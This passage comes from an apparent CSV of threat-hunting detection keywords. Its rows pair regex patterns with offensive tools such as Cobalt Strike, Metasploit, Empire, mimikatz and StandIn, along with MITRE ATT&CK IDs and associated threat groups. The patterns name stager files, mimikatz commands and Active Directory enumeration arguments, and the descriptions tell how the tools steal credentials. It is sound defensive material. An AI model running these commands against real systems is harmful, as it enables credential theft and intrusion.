APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*stager_hidden_bind_tcp.asm*",".{0,1000}stager_hidden_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*stager_reverse_https.bin*",".{0,1000}stager_reverse_https\.bin.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*stager_sock_find.asm*",".{0,1000}stager_sock_find\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*stagers/*/aes.py*",".{0,1000}stagers\/.{0,1000}\/aes\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stagers/*/diffiehellman.py*",".{0,1000}stagers\/.{0,1000}\/diffiehellman\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stagers/*/get_sysinfo.py*",".{0,1000}stagers\/.{0,1000}\/get_sysinfo\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stagers/*/rc4.py*",".{0,1000}stagers\/.{0,1000}\/rc4\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Stagers\ExeStager\*",".{0,1000}Stagers\\ExeStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Stagers\SvcStager\*",".{0,1000}Stagers\\SvcStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
"*stagerx64.bin*",".{0,1000}stagerx64\.bin.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*standard::answer*",".{0,1000}standard\:\:answer.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::base64*",".{0,1000}standard\:\:base64.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::cd*",".{0,1000}standard\:\:cd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::cls*",".{0,1000}standard\:\:cls.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::coffee*",".{0,1000}standard\:\:coffee.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::exit*",".{0,1000}standard\:\:exit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::hostname*",".{0,1000}standard\:\:hostname.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::localtime*",".{0,1000}standard\:\:localtime.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::log*",".{0,1000}standard\:\:log.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::sleep*",".{0,1000}standard\:\:sleep.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::version*",".{0,1000}standard\:\:version.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standin --asrep*",".{0,1000}standin\s\-\-asrep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --dc*",".{0,1000}standin\s\-\-dc.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --delegation*",".{0,1000}standin\s\-\-delegation.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --group *Domain Admins*",".{0,1000}standin\s\-\-group\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - 
T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --object *",".{0,1000}standin\s\-\-object\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --spn*",".{0,1000}standin\s\-\-spn.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*StandIn.exe 
--*",".{0,1000}StandIn\.exe\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*StandIn.exe"" --*",".{0,1000}StandIn\.exe\""\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*StandIn_v12_Net35_45.zip*",".{0,1000}StandIn_v12_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*StandIn_v13_Net35_45.zip*",".{0,1000}StandIn_v13_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*Stardust.Win32.NtProtectVirtualMemory(*",".{0,1000}Stardust\.Win32\.NtProtectVirtualMemory\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" 
"*Stardust.Win32.RtlAllocateHeap(*",".{0,1000}Stardust\.Win32\.RtlAllocateHeap\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*STARDUST_MACROS_H*",".{0,1000}STARDUST_MACROS_H.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*stardust50578/rdp_brute*",".{0,1000}stardust50578\/rdp_brute.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" 